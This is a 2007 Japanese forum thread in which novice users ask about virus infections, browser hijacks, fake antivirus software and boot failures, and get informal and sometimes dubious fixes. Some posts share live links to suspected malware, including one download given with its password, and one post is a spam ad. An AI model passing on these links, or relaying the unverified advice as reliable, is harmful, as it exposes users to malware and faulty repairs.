gooメールの受信ボックスに英語で「私の事好き?」の件名で送信者はバージニアからでした。
クリップみたいなマークもついていて怖くて開けません。
最近PC購入したばかりで主にヤフオクとユウチュウブしか見てません。
どうしたら良いでしょうか?
317まちがって名前消しちゃいました。:2007/08/07(火) 20:07:20 ID:b6osFS7M
PHP_SHELL.Gを踏んでしまいました
隔離に失敗して手動で削除が必要と出ました。
どうやって削除したらいいんでしょうか。
318まちがって名前消しちゃいました。:2007/08/08(水) 02:18:53 ID:OEeew2at
さっきアニソン落としてたんだが、ウイルス踏んだっぽいんだ
誰か助けて下さい
319まちがって名前消しちゃいました。:2007/08/08(水) 02:30:24 ID:OEeew2at
データ消えたケド復活しました
320まちがって名前消しちゃいました。:2007/08/08(水) 02:39:37 ID:vJoF+vxw
かおる姫というウイルスを踏んだんですけど
どのようなウイルスですか?情報を消されたのですか
どうやったらウイルスを削除できますか?
321( =@ω@=) ◆NIral10/7M :2007/08/08(水) 03:29:41 ID:???
>>316
迷惑メール登録しなされ メールを開かないのは正解

>>317
インターネット一時ファイル削除して もう一度ウィルススキャンしなされ

>>318
ぽいって何だ ぽいってw 助けてといわれても

>>320
「解凍すると、[image.tv] 磯山さやか〜.zipとquaol.zipが出来るス
さらに磯山zipの中にかおる姫.zipがあるので解凍するとかおる姫.exeと.jpgがあるス
でもってかおる姫.exeからTrojan horse Generic.NRを検出 PC有害」
って書き込み ググって見つけたんだけど コレの事?
ワームっぽい名前だけど スキャンした? 結果は何とでた?
322まちがって名前消しちゃいました。:2007/08/08(水) 03:47:39 ID:???
すいません、不安なので質問させていただきます。
MSNメッセンジャーを起動していたところ、知り合いの名前で
英語の文と同時にスクリーンセーバーのファイルが送られてきて、
その時は何も思わず受けとって起動してしまい(馬鹿だ・・・orz)
案の定ウイルスにかかってしまいまして・・・。
すぐにノートンでスキャンしてW32.Spybot.Wormを削除したんですが、
それからもしつこく何回も知り合いの名前で英語の文とファイルが送られてきます。
10分程度で完全に削除はできているとは思うのですが、もしかして
自分から他者へ、またはその名前を語られている知り合いが感染している可能性がありますか?
チェックしてもらうように話しかけましたが、なにぶん夜中なので・・・。
よろしければ、詳しい方教えていただけないでしょうか?
323まちがって名前消しちゃいました。:2007/08/08(水) 05:00:05 ID:N4jqcnwo
>>322
ファイル名を指定して実行→regeditと入力してレジストリエディタを起動させる

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"Microsoft Genuine Logon" = "svchost.exe"
というエントリがあったら感染してる。
324まちがって名前消しちゃいました。:2007/08/08(水) 09:39:59 ID:m8TJfoy/
1週間で10GBもHDD容量が減ってしまいました
その間特に変わったことはしてなくて…
ニコニコ動画見まくってた位なんだけど
知らないうちにウイルスとかにやられてるんでしょうかorz
ちなみに7/22にノーパソ買ったばかりでVistaです
325まちがって名前消しちゃいました。:2007/08/08(水) 14:36:23 ID:OEeew2at
自分もかおる姫にやられました
326まちがって名前消しちゃいました。:2007/08/08(水) 16:13:53 ID:mFK+hBNM
 ◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆

 完全無料で月30万円を手軽に稼ぐネットビジネス

 ◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆

 年齢、性別、地域も全部不問!誰でも超カンタン!

リスクゼロ!完全無料!1日30分で30万楽々ゲット!
    
      ↓     ↓     ↓
    
    http://jyodowoyobe.blog107.fc2.com/
327まちがって名前消しちゃいました。:2007/08/08(水) 18:04:49 ID:???
Yahoo!とかGoogleとかで検索して出たサイトにアクセスしようとすると外国のエロサイトにアクセスしちゃうんだけど
これってウイルス?
対処法よろ
328まちがって名前消しちゃいました。:2007/08/08(水) 18:06:20 ID:???

すぐ前に同じような人がいたわ
329まちがって名前消しちゃいました。:2007/08/08(水) 19:19:43 ID:Sf+MwLJU
Trojan-Clicker.Win32.Delf.gl
Backdoor.Win32.VB.kb
カスペルスキーのフリーオンラインスキャンで調べたらこんなんでました。
調べてみてもこのウイルスの情報があんまりひっかからなくて困ってます
どなたかこの上二つのウイルスの情報知ってる人居ませんか?
330まちがって名前消しちゃいました。:2007/08/08(水) 20:50:10 ID:qxyxBXC9
先ほどネトゲやってて放置したら勝手再起動を繰り返すようになってしまいました・・・
画面に変な色がちりばめられて電源入れてもなおりませんウィルスでしょうか?
331まちがって名前消しちゃいました。:2007/08/08(水) 23:03:30 ID:VPnWv4Dk
PCがぶっこわれた
起動すると
NTLDR is missing
Press Ctrl+Alt+Del to restart
って出て、その操作をして再起動しても
また上と同じ画面が出ます
出来ればリカバリーはしたくない…
というかリカバリーも出来ない気が
何とかなりませんか
332AB:2007/08/08(水) 23:38:02 ID:AbgxGeEJ
インターネットをクリックするとファイルのダウンロードーセキュリティの警告とでてしまってインターネットに接続しません(><;)
こういう場合どうしたらいいですか!?

ウィルスもひっかからずわけわからなくて…
お願いします。
333( =@ω@=) ◆NIral10/7M :2007/08/08(水) 23:48:03 ID:???
>>330
ブラスターウィルスにやられた あるいは電源部orマザボの故障では

>>331
起動ディスクを作ってれば使用 回復コンソール起動 中身を他PC使って拾う
等の方法 試してみなされ

334( =@ω@=) ◆NIral10/7M :2007/08/09(木) 00:02:03 ID:???
>>332 コレは?

InternetExplorerで、「セキュリティ保護のため、このサイトによる、このコンピュータへのファイルのダウンロードがInternetExplorerによりブロックされました」と表示される。
*******************************************************

情報バーをクリックすることで、ファイルのダウンロードを許可することができますが、ダウンロードを許可する前に、次の点を確認してください。

・該当のページが信頼できるページであること。
・ファイルやプログラムをダウンロードする心当たりがある
 こと。
・ダウンロードするファイルが信頼性のあるものであること。

信頼性の低いページや、ファイルのダウンロードをする心当たりがない場合は、すぐにダウンロードは行わず、そのままページを閲覧するか閉じることをおすすめします。
または、ページの提供元に、メッセージの内容について確認してください。

信頼性の低いページでは、意図しないプログラムや悪意のある不正なプログラムがダウンロードされることがあります。
ファイルのダウンロードの許可は、充分に注意し、自己責任において行ってください。

ファイルをダウンロードしても安全であることが確認できた場合は、次の手順で、ダウンロードを許可することができます。

1)「セキュリティ保護のため、このサイトによる、このコンピュータへのファイルのダウンロードがInternetExplorerによりブロックされました。」という部分をクリックし、表示されたメニューの「ファイルのダウンロード」をクリックします。
2)「ファイルのダウンロードセキュリティの警告」が表示されます。
3)「保存」ボタンをクリックし、任意のフォルダに保存してください。
335AB:2007/08/09(木) 00:40:13 ID:sUQ5NBNX
334さんありがとうございます。
あのー、インターネットをクリックするといきなりこのファイルを保存しますか!?になっててキャンセルしてもまたインターネットをクリックすると同じのが現れて…


既定のプログラムでは開けません、壊れているか正しくないファイルが指定されていることが原因ですってなるんですが…

説明がわかりにくくてすいません(泣)
336( =@ω@=) ◆NIral10/7M :2007/08/09(木) 01:33:14 ID:???
>>335
↓コッチかな? 試してみなされ
http://support.microsoft.com/kb/937409/ja

こんな方法もあるらしいけど ↓の「2007/May/11」
http://www5b.biglobe.ne.jp/~ecm/memo/
337まちがって名前消しちゃいました。:2007/08/09(木) 07:46:07 ID:???
>>327だけどWikiに書いてある駆除サイトで落としたソフトで対処したら
確かにエロサイトには飛ばなくなったけど
ページが表示できませんに飛ぶようになった
前よりはましなんだけどどうせなら完璧に直したい
恐らく前に書き込みしていた人も同じ状況になってるはずだから
いい対処法は他にないだろうか?
338まちがって名前消しちゃいました。:2007/08/11(土) 15:50:54 ID:EYk6IDXs
>>319
自分もかおる姫踏んでデータが全部消えたっぽいんですけど、
どうやって復旧しました?????
今かなりパニクってる><
339まちがって名前消しちゃいました。:2007/08/12(日) 00:01:27 ID:???
>>338
かおる姫踏んでしまった。
再起動はしないほうがいい。
NTLDR is missing..
とでて起動できなくなってしまう。

解消方を誰か頼む。
340まちがって名前消しちゃいました。:2007/08/12(日) 17:01:31 ID:mCzs+BGm
すいません、教えてください。
数日前から全てのサイトではないけど、いくつかのページを見ようとすると、
「このプログラムは不正な処理を行なったので強制終了します」が出て、その後で「コンピューターを再起動してください」となります。
もちろん再起動しても何も解決しません・・・・
恥ずかしながらOSも98(!!)なのでバージョンアップもできません。
解決策はあるでしょうか?
341まちがって名前消しちゃいました。:2007/08/12(日) 18:21:54 ID:X0p9OZKl
なんかトロイ感染しちゃったみたいなんだけどどうしよう

リカバリすればおk?
342まちがって名前消しちゃいました。:2007/08/12(日) 19:10:38 ID:xFxrIOuF
http://asiapassion.net
これを踏んだらなんかウイルスバスターがウイルス見つけたみたいなんですが
どうしたらいいのでしょうか?
ウイルス検出時の処理が、隔離できませんとなっています。
何かしないといけないですか?
お願いします。
343まちがって名前消しちゃいました。:2007/08/12(日) 19:32:32 ID:yZS3qV33
知らないうちにインターネットを介して
他人に自分のパソコンの中身を覗かれる
ことってあるのでしょうか??
電源を切るときに「他の人がログオン中です。今電源を切ると
データが失われる可能性があります。」的なメッセージが
表示されたことがあるのですが、これは誰かが自分のパソコンに
不正にアクセスしているということでしょうか??
パソコンに保存してある個人的な手紙などもすべて見られた可能が
あるということですか??
↑これが一番気がかりです。。。
予防策として大切なフォルダのプロパティーの
「このフォルダをプライベートにする」ところをチェックした
のですが、これって効果ありますか??
それからファイアウォールの
「有効」と「例外を許可しない」にチェックを
いれたのですが、これは効果ありますか??
他に予防策ってありますか???
344まちがって名前消しちゃいました。:2007/08/13(月) 23:29:24 ID:???
ネット回ってたらウイルスバスターの緊急警告が開き、感染したっぽいのですが、その後ウイルスバスターの検索をしても引っかかりません。
printer.exeって名前のもので、タスクバーに常駐していてポップアップが出し、クリックするとスパイウェアサイトに飛ばされます。
普通のファイル検索で探し、C:\WINDOWS\system32にあったので該当時間の疑わしいファイルは全て手で削除したらタスクバーなどからは消えたのですが、完全に直っていないらしいです
感染以来時計・システムの復元などの設定関連を開こうとすると「このコンピュータの制限により処理は取り消されました システム管理者に問い合わせてください」と警告が出ていじれません
どのようにすれば解除できるか、わかる方いたらご教授願います
長文失礼しました
345まちがって名前消しちゃいました。:2007/08/14(火) 01:14:34 ID:5i8uESE5
私もかおる姫ひっかかりました。
慌ててファイルを削除してしまったのですが、これはどういうウイルスなのでしょうか?
また、駆除出来たかどうかを確認する方法どなたか教えていただけないでしょうか?
346まちがって名前消しちゃいました。:2007/08/14(火) 01:22:05 ID:B248MF8o
自分もかおる姫に引っかかり再起動してしまいました。
NTLDR is missing の画面から進みません><
347まちがって名前消しちゃいました。:2007/08/14(火) 01:26:08 ID:LfZiTlqF
>>345
対処法を見つけるまではシャットダウンと再起動等はしないように
俺も引っ掛かって困ってるんだぜ
とりあえず基本的なファイル意外は全部消えたよ、俺
一緒に頑張ろうぜ
348まちがって名前消しちゃいました。:2007/08/14(火) 01:38:57 ID:5i8uESE5
349まちがって名前消しちゃいました。:2007/08/14(火) 01:46:27 ID:???
アンチウィルスソフトにログは残っていませんの?
かおる姫組の症状を見るに、それだとつじつまがあわない・・・
350まちがって名前消しちゃいました。:2007/08/14(火) 01:48:46 ID:5i8uESE5
これ俺のPCじゃねえからわかんねー
ノートンログの見方わかんねえよノートン!
351まちがって名前消しちゃいました。:2007/08/14(火) 01:51:22 ID:5i8uESE5
ログでた
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2004-021914-2822-99
発生源は\かおる姫\かおる姫.exe\だた
352まちがって名前消しちゃいました。:2007/08/14(火) 01:54:15 ID:???
トロイの木馬にも種類があるんで、その種類を知りたいんだが・・・
Trojan Horseと認識されるとは・・・

一応聞くけど、ノートンのウィルスデータベースは最新?
353まちがって名前消しちゃいました。:2007/08/14(火) 01:55:59 ID:5i8uESE5
いや、これ姉貴のPCなんだけど、去年PCを買って今日初めてネットに繋いだから大分怪しい。
多分2006。

354まちがって名前消しちゃいました。:2007/08/14(火) 01:57:54 ID:???
>>353
漠然と「頭痛がします」では対処ができない。つまりそういうこと。
他のかおる姫組の降臨を待つしか・・・
355まちがって名前消しちゃいました。:2007/08/14(火) 02:02:20 ID:5i8uESE5
俺のはデスクトップに保存して、それからそのまま削除したから大丈夫だったのかもしれない。
でもやっぱ怖いっていうか不安!
役に立たなくてスマン
356まちがって名前消しちゃいました。:2007/08/14(火) 02:59:34 ID:Xy2vNi/q
かおる姫にかかってお手上げ状態な人が追加されましたよー


orz
357まちがって名前消しちゃいました。:2007/08/14(火) 08:52:36 ID:zJ4DW4ja
アプリ未起動状態(常駐プログラムも含)なのですが
定期的に「カチッ」「カチッ」って音がして非常に気がかりなのですが
ウイルスなんでしょうかねぇ?・・・
358まちがって名前消しちゃいました。:2007/08/14(火) 09:36:30 ID:???
youtubeやyourfilehostの動画を見ると途中でブラックアウトして電源ボタン長押しするしかなくなります
ただ、以前メモリを増設して始めてだったものでそのときなにかしてしまったのかもしれません
ほこりが入ったりメモリがうまく入らなくてベタベタ触ったりと・・・
ウイルスかもしれないのですがどうでしょうか・・・?
359358:2007/08/14(火) 10:35:41 ID:???
というかその他のなんてことない作業中でもブラックアウトもするみたいです
360まちがって名前消しちゃいました。:2007/08/14(火) 15:36:17 ID:yAP8a4I6
http://wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww.wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww.org/
こいつはウイルスなのか?
これの中身を見た後に動作がおかしくなった訳だが。
361まちがって名前消しちゃいました。:2007/08/14(火) 15:39:25 ID:6PEVmhFp
今ウイルスバスターでウイルス検索してたら
きゅうにエラー音がして画面見たらウイルスを処理できませんってでてきた
もう手遅れですか?
362まちがって名前消しちゃいました。:2007/08/14(火) 16:32:04 ID:???
突然PCの電源が落ち、起動したけど途中で止まってしまいます。
「無効なBOOT.INIファイルです」って出るんですが、
感染したのでしょうか??
ウイルスバスター入れてるんですけど、、、
363まちがって名前消しちゃいました。:2007/08/14(火) 17:06:41 ID:TzWWW8u2
http://ddo-jp.ddo.jp/download.php?no=14709

↑これね  パス 777

これなんだけど、この中身にあるexeダブルクリした瞬間電源切れて
PC起動しなくなるウイルスなんだけどw
<Windows root>\system\hal.dll.が壊れるらしい インストールし直してください
で立ち上がらないんだけどさ〜

きのう悲惨な目にあったんだけど また検索かけてみたらバスターまったく
意味ない・・・w 検索検出すらされないwww  
ノートン先生もスルーしてるしw  新種だおこれ  
こわいこわい   
364まちがって名前消しちゃいました。:2007/08/14(火) 17:43:01 ID:PtlsOsje
>>362
たぶんBOOT.INI壊れたかも
365まちがって名前消しちゃいました。:2007/08/14(火) 18:42:39 ID:x9OZaAou
再起動するな

IEオプションからキャッシュを根こそぎ削除
それから該当ファイルを消去

たったこれだけであぼーんは回避できる

リスタートしたらリカバリしか手はないぞ
366まちがって名前消しちゃいました。:2007/08/15(水) 01:01:47 ID:EP7FIVJk
携帯から失礼しましす。
昨日パソコンのマウスが止まって、キーボードも反応しなくなったので、
コンセントを抜いて、起動して、AVAST! 4.7Home Editionでウイルスチェックしたら
Win32:Trojan-gen.{Other}が2つ、
Win32:Adware-gen.{Adw}が1つ
検出されました。チェストに移動し、その後に削除したんですが、インターネットに繋がりません。
どうしたら繋がるようになりますか?教えて下さい。お願いします。
367まちがって名前消しちゃいました。:2007/08/15(水) 01:14:32 ID:jIYSr3cI
ウイルスっぽいです。
症状はディスプレイが流れて真っ白になってしまいます。orz
対処法等教えていただけますでしょうか。
368まちがって名前消しちゃいました。:2007/08/15(水) 14:50:25 ID:0zkvPnvv
対策ソフトはどれがいいの?
369質問です:2007/08/15(水) 16:52:47 ID:vym3OseP
sotec ノート wl7160c を数年前に購入したのですが、付属のXP OSを盗まれてしまい
ほかに購入したXP PROFEESIONA をインストールしました。

ところが、マルチメディア関係のデバイスのドライバがインストールされず、困っています。

メーカーサイトで探しているのですが、マザーボードファームウェアのドライバしかみつかりません。

これをダウンロードして実行しましたが、マルチメディア関連のドライバは黄色い?マークのままです。

これらのドライバはどこで入手すればよいのでしょうか?

また、インストール方法は間違っていないでしょうか?
370369:2007/08/15(水) 16:53:59 ID:???
自己解決しました^^;
371まちがって名前消しちゃいました。:2007/08/15(水) 18:04:16 ID:cTNRDy/Q
Windowsantivirus2007
日本版がでています。 いかにもスパイウエア対策ソフトのような
名前で巧妙にダウンロードさせ感染させます。
カード支払で対策ソフト購入を要求する画面に誘導し、
危うくひっかかるところでした。

しかし危険なウイルスには感染してしまいました。
ただ対処がわからんのです。

WINDOWSのコントロール権限を破壊します。

情報求む。
この状態だとシマンテックのソフトのアップデートもできません。

372まちがって名前消しちゃいました。:2007/08/15(水) 18:06:30 ID:cTNRDy/Q
Windowsantivirus2007
日本版がでています。 いかにもスパイウエア対策ソフトのような
名前で巧妙にダウンロードさせ感染させます。
カード支払で対策ソフト購入を要求する画面に誘導し、
危うくひっかかるところでした。

しかし危険なウイルスには感染してしまいました。
ただ対処がわからんのです。

WINDOWSのコントロール権限を破壊します。

情報求む。
この状態だとシマンテックのソフトのアップデートもできません。

警察にも通報しようと思います。
373まちがって名前消しちゃいました。:2007/08/15(水) 18:26:50 ID:/ec11tV1
374まちがって名前消しちゃいました。:2007/08/15(水) 18:27:25 ID:/ec11tV1
誤爆orz
375まちがって名前消しちゃいました。:2007/08/15(水) 19:24:10 ID:ba+F6DMZ
すみません
至急教えてもらいたいです

先程サイトを見ていたら「トロイの木馬が検出されました。ファイルを隔離する・今の作業を続ける。」
というマカフィーのメッセージが出てきました

初めてだったので焦ってしまい間違えて今の作業を続けるを押してしまったんですがどうすればいいんでしょうか?

助けて下さい
376まちがって名前消しちゃいました。:2007/08/17(金) 00:44:35 ID:Gw7ArsGZ
AntiVirusFREEをダウンロードしたらWindowsを起動できなくなりました…どう対処すればいいのか全く分かりません…どなたか詳しい方教えていただけないでしょうか。
377まちがって名前消しちゃいました。:2007/08/17(金) 00:46:50 ID:gsbuH+zC
http://www.hackpalace.com/virii/makers/

ここについて詳しくたのんます
378まちがって名前消しちゃいました。:2007/08/17(金) 10:47:51 ID:Hy/f0ddj
ニコニコ動画のサイトのリンクを踏んだら、なんか変な校歌みたいな曲が勝手に流れて止まらなくなりました。
どこをいじればこのウイルスだかスパイウェアだかが削除されますか?
379まちがって名前消しちゃいました。:2007/08/17(金) 19:49:14 ID:Y4N/akXC
ピクトの画像と思ったらトロイでした。携帯だったのですが携帯もウイルスにかかるのでしょうか
380まちがって名前消しちゃいました。:2007/08/18(土) 04:41:01 ID:8aGVRLrB
Cookieは無害?
381まちがって名前消しちゃいました。:2007/08/18(土) 07:55:36 ID:???
cookieが有害てw
382まちがって名前消しちゃいました。:2007/08/18(土) 22:46:26 ID:wtNPnGae
ゲームを起動しようとしたら、急に電源が落ちるんですが、これって
ウイルスなんですか?教えてくださいお願いします。
383まちがって名前消しちゃいました。:2007/08/19(日) 11:02:27 ID:EAjHZd56
どなたかタスケテ下さい。
昨晩、嫁が実家に帰ったので、エロサイトにいったんです。

で、今朝、検索しようと、IEからグーグル、検索して、いくつかでた検索先から
そこにいこうとしたら・・・海外エロサイトへ。
何を検索しようが、そこのサイトに行ってしまいます。

ウィルススキャンをしてもひっかからないし、接続設定?からみても
なにをいじったらいいかわりません。

よろしくお願いします。
384まちがって名前消しちゃいました。:2007/08/20(月) 12:07:30 ID:???
昨日海外のサイトを訪れた際、ビデオのソフトらしき物をインストールして感染しました
症状は画面が赤いプライベート デンジャーなる物に変えられて、システムアラートがしつこくポップアップした後
ウイルスソフト駆除画面がブラウザー(IE)でたちあがります。
*注意 以下アドレス  http://www.safewebnavigate.com/index.php?sid=0&aid=0&said=0&pn=&pid=0

どうやらフィッシングのスパイウエアの様なのですが、なにをやっても駆除できません。
起動時からバックグラウンドで常時稼動している付しがあります。
以下の処置はしてみましたが、効果ありません。よろしくお願いします。
・マカフィイ フルスキャン
・ウイルスバスターお試し版 フルスキャン
・マイクロソフト ディフェンダー フルスキャン
・キングソフト フルスキャン
385まちがって名前消しちゃいました。:2007/08/20(月) 14:21:13 ID:8cTDryao
386まちがって名前消しちゃいました。:2007/08/20(月) 21:33:01 ID:cHZ/ozxx
>>384
だめもとでこれ
http://www.asciisolutions.com/products/adaware/index.html
やってみてはいかがか。
387まちがって名前消しちゃいました。:2007/08/23(木) 01:03:08 ID:rU9XAoWa
かおる姫を再起動させてしまったのですが、対処法はどのようにしたらよろしいのでしょうか?
かおる姫組は、やはりこのスレに多いのでしょうか?
PCに詳しいかた、お助け下さい。
388まちがって名前消しちゃいました。:2007/08/23(木) 01:47:06 ID:???
動画再生したら原田ウィルスOO(ダブルオー)を見れました
動画再生後その動画を保存していた外付けHDDが認識されなくなりUSB指し直したところ認識されました
で特に症状は見られません
原田に対応されてるオンラインスキャンってありますか?
389まちがって名前消しちゃいました。:2007/08/23(木) 13:04:07 ID:???
>>386
レスサンス

あれからかなりのフリーソフトを投入してなんとか影響のすくない状態までは持ってこれたんだけど、まだ完全に駆除しきれて
ないです。レジストリを書き換えようとするウイルスとクッキーに悪さするウイルスが検索のつど検出される。
週末再インスコします。
390まちがって名前消しちゃいました。:2007/08/23(木) 18:58:34 ID:JL7P68FQ
PC知識まったく無いのですが突然画面が真っ暗になり人の声がきこえてくるのですが
多分寿命だと思うんですがウイルス的な要因なんでしょうか?
391まちがって名前消しちゃいました。:2007/08/24(金) 18:59:35 ID:FpjnjT3s
>>390
心配ならスキャンしなされ。
ウィルススキャンソフト買ってくるか、オンラインスキャンサービス利用しなされ。
http://cowscorpion.com/Outline/secu_on.html
削除は手動かもしれない。
スキャンで引っかかったファイルをエクスプローラーから消す。
実行中で消せなかったらctrl+alt+deleteでタスクマネージャー起動して、
実行されてるウィルスを強制終了させてから消すこと。
392まちがって名前消しちゃいました。:2007/08/25(土) 11:02:29 ID:WXiBkVy5
助けてください。

ネットなどをやっていると突然青い画面に文字(エラー?)
が出て、次は黒のバックにウィンドウズを通常起動するやら
出てかなり悩んでいます。

こまめにスパイウェアなどを検索すると
1〜6件引っかかります(cookieやらなにやら)

わかりづらくて申し訳ありませんが
どうにか対処できませんか?
393まちがって名前消しちゃいました。:2007/08/25(土) 11:22:15 ID:WBMiFr/j
394まちがって名前消しちゃいました。:2007/08/25(土) 15:58:24 ID:PnBjpgsu
感染してから、(たぶんエロサイトを見たときに感染)
ウイルスバスターを入れたんですが
削除できないウイルス一部あって(指定されたフォルダにない、検索しても出てこない)
毎日違う名前の危険度低のウイルスが起動します(PAK_GENERIC.006等)
その他、2chを見ていてもエロサイトが起動します
どーしたらいいの?
395まちがって名前消しちゃいました。:2007/08/25(土) 16:24:08 ID:FdYpTEqX
起動してしばらくするとマウスカーソルの動きが鈍くなってマウスが利かなくなります
キーマウスは利きますが動作が不安定です
396まちがって名前消しちゃいました。:2007/08/25(土) 17:36:10 ID:5vWfK9F6
ttp://www7.2kdown.com/link.php?ref=mRerTO5p1e

謎のファイル
誰かなんとかしてくれ
397まちがって名前消しちゃいました。:2007/08/26(日) 02:27:27 ID:3lxch3TG
OSをログオフしたあと、
真っ黒な画面の真ん中の奥のほうに井戸みたいなのが出るんですけど、
ウィルスですか?

怖くて夜寝れません。
398まちがって名前消しちゃいました。:2007/08/26(日) 02:43:48 ID:???
>>397
それは貞子ウィルスです。
今すぐリカバリ。
























































脳内を・・・。
399まちがって名前消しちゃいました。:2007/08/27(月) 09:47:52 ID:???
ぶっちゃけ質問する前にクリーンインスト自分でやってみ。

データは外付けなりに移動して、まっさらなインストして
アンチソフト(お前らならウィルスバスターお薦め)セット。
移動したデータを検索して問題ないなら元に戻す。

んで自分でぁゃιぃサイト覗いてるなら、毎日アンチスパイウェア
は必ず掛ける。今はちょっとした海外サイトなら必ずあると思っていい。

その後は友人のデータにしても必ずウィルス検索。
メールはデフォでテキストのみ読むようにする。

中途半端に対応した所でウィルス増やすだけ。
400まちがって名前消しちゃいました。:2007/08/28(火) 15:18:01 ID:???
こんにちは。前から聞きたかったので質問。
ウイルス等で日本語入力のIMEの辞書や入力が壊れた場合、
まずはウイルス削除するだろ。それで、日本語が打てない状態なので、
またIMEを再インストールって出来るの?
その場合、XPのCDでIMEだけもう一度セットアップするの?
401まちがって名前消しちゃいました。:2007/08/29(水) 19:12:33 ID:KqPHhbDF
402まちがって名前消しちゃいました。:2007/08/29(水) 21:09:12 ID:???
403まちがって名前消しちゃいました。:2007/08/29(水) 21:22:48 ID:???
突然すいません。
「HARADA virus」というものにかかってしまったようで、itunesも機能しなくなりました。
itunesのアイコンをデスクトップから開こうとすると変な画像が出てきてしまい、起動しません。
どうやらファイルを置き換えられているようなのですが、初心者なもので解決方法がわかりません。
どうか元に戻す方法を教えていただけないでしょうか?
404まちがって名前消しちゃいました。:2007/08/29(水) 23:31:50 ID:KfzIrS7g
まだ出ます。
OSをログオフしたあと、
真っ黒な画面の真ん中の奥のほうに井戸みたいなのが出るんですけど、
ウィルスですか?

怖くて夜寝れません。
405まちがって名前消しちゃいました。:2007/08/30(木) 02:00:09 ID:???
>>404
釣り師乙。
406まちがって名前消しちゃいました。:2007/08/30(木) 18:27:10 ID:???
PCの電源がいきなり落ちることがあります
主にニコニコ動画を見てる時とか動画を変換してる時に落ちます
その後電源を付けようと電源ボタンを押しても反応がなく
コンセントを抜いて再度入れ直すと電源が付くんです
ウィルスに感染してるのでしょうか
OSはXPです
407まちがって名前消しちゃいました。:2007/08/30(木) 19:05:02 ID:qKMX7MB0
ちょっとスレ違いかもなんですが、メールで届いた仕事の添付ファイルをウィルスソフトが削除してしまいました。

制限のあるファイルです、という理由でした。提出しなければならないものなのでどうにかしたいのですが復元は可能でしょうか…

やはりウィルスソフトの設定を解除して送りなおしてもらうしかないですのでしょうか。
408まちがって名前消しちゃいました。:2007/08/30(木) 20:19:07 ID:bsLnz3+H
適当なファイル等をクリックすると
そのファイルが開き続けます。
どう対処したらよいでしょうか?
409まちがって名前消しちゃいました。:2007/08/31(金) 13:32:13 ID:4DSlQ+Iw
2[1].ani
EXPL ANICMOO.GEN

cyber[1].wmf
EXPL WMF.GEN

画像から感染した。。
検索してもみつからないです・・・
どうすれば。。
410まちがって名前消しちゃいました。:2007/08/31(金) 14:31:14 ID:4DSlQ+Iw
続けてカキコすみませぬ・・

トレンドマイクロのウイルスバスターで再度検索したところ
ファイル名の頭がすべてクッキーでした・・・

危険度は中 これは削除すべきでしょうか?
411中国:2007/09/01(土) 01:38:20 ID:???
きになるなら、消せば。
412まちがって名前消しちゃいました。:2007/09/02(日) 08:34:51 ID:paFqSudi
パソコン初心者なんです。泣いちゃいそうなぐらい不安なので教えて下さい。
さっき開いた画像で柔道のヤワラちゃんが出てきた瞬間、ばーっとエロサイト?がいっぱい出てきました。
ウイルスバスターもかなり大量に「危険」と表示されたんですが、何が何だかわからなくて無理矢理電源を切りました。
何分か後に再起動したら今の所異常はなさそうですが、今後意味不明な料金請求とかパソコンの不具合とかあるのでしょうか?
413まちがって名前消しちゃいました。:2007/09/02(日) 18:19:13 ID:mxuucyfm
>>412
ばーっといっぱい出てきたのはJavaScriptだと思われ。それ自体に多分実害は無い。
料金請求はこないはず。なんもメールアドレス送ったりしてないでしょ。
不具合が心配ならせっかくウィルスバスター入ってるんだから、完全スキャンしなされ。
414まちがって名前消しちゃいました。:2007/09/02(日) 19:14:24 ID:???
質問です、2Chブラウザはまともに動くのですが
IEなどでネットに繋ごうとしたら「サーバーが見つかりません」と出ます
どのサイトを開いても上記の通り
唯一まともに表示されるのはgoogleだけで検索先に飛んでも「サーバーが・・・」
これはウイルスでしょうか?
415まちがって名前消しちゃいました。:2007/09/02(日) 20:14:05 ID:???
すいません、未熟な私に教えてください
文字を打つたびに、押してもないのにssssssssssss
と連続してsの文字が出るんです
肝心なときsの文字を打っても出ません
ウイルスでしょうか?
416まちがって名前消しちゃいました。:2007/09/03(月) 10:40:33 ID:s2lNs83m
どうもウイルスかどうか分からないんですが、PCが使い物にならなくなりました。
昨日、その日初めて起動したら、
「\SYSTEM32\CONFIG\SYSTEMファイルが壊れました」
と出て、指示通りWindowsセットアップを行おうとしたら、「同意する」を押した後、
「以前のウインドウズバージョンを検索中・・・」で止まってしまいます。
修復も再インストールも出来なくなりました。P2Pなどはやっていません。
結局PC本体を昨日買い替えました。アンチウイルスソフト付き59000円で・・・うっ。
何か情報がありましたらご教示願いたいのですが・・・
417まちがって名前消しちゃいました。:2007/09/03(月) 11:34:22 ID:tMH8icG6
>>415
キーボード故障か、埃がたまってるか接触不良じゃなかろうか。
掃除機で吸うか、エアークリーナー吹いてだめならキーボード交換。
友達のキーボードが借りれるなら借りて試して原因の切り分けすると良い。
418まちがって名前消しちゃいました。:2007/09/03(月) 12:11:51 ID:???
>>415と同じ症状なんだが・・・

会社のPCは VAIOのvista
先週の木曜日から>415の症状と同じだけどsではなく数字の9でなってる
同じ症状の報告がないかとうろついてみたが
他スレでnの症状が一人いただけ。

会社だから他のPC使えば済むけどウィルス?故障?と困っていた。
なにせ 電源入れて立ち上げると警告音が鳴るんだから・・・・
購入して3ヶ月目 (オフィスOA機器業者から購入)
キーボードが原因とも思えないんだが?やっぱ不良品か?

PCの使用者に何をしたか聞いたら ブログ散歩してただけと言う。
ま、問い詰めても本当のことは言わんだろうが・・・
セキュはノートンのお試し期間終わってバスターのお試し中

さて、やはり故障ですかね?
4194 ◆NFQtmGW3bw :2007/09/03(月) 13:25:18 ID:???
>>415
それ俺も経験あるwww
でもSキーはちゃんと使えたな。
なんか勝手にssssssssssって出るんでしょ?
解決方法不明です、でも自分は勝手に直りました。

>>418
自分の予想ではキーボードの故障、もしくは本体の故障でしょうね。
ちなみに自分のPCは買ってから6年になります。
420まちがって名前消しちゃいました。:2007/09/03(月) 16:01:31 ID:ZcBI6M7w
カーソルが勝手に右に左に飛んで行きます。
治りますか?
421まちがって名前消しちゃいました。:2007/09/03(月) 17:28:09 ID:+IHBLNSM
パソコン超初心者です。
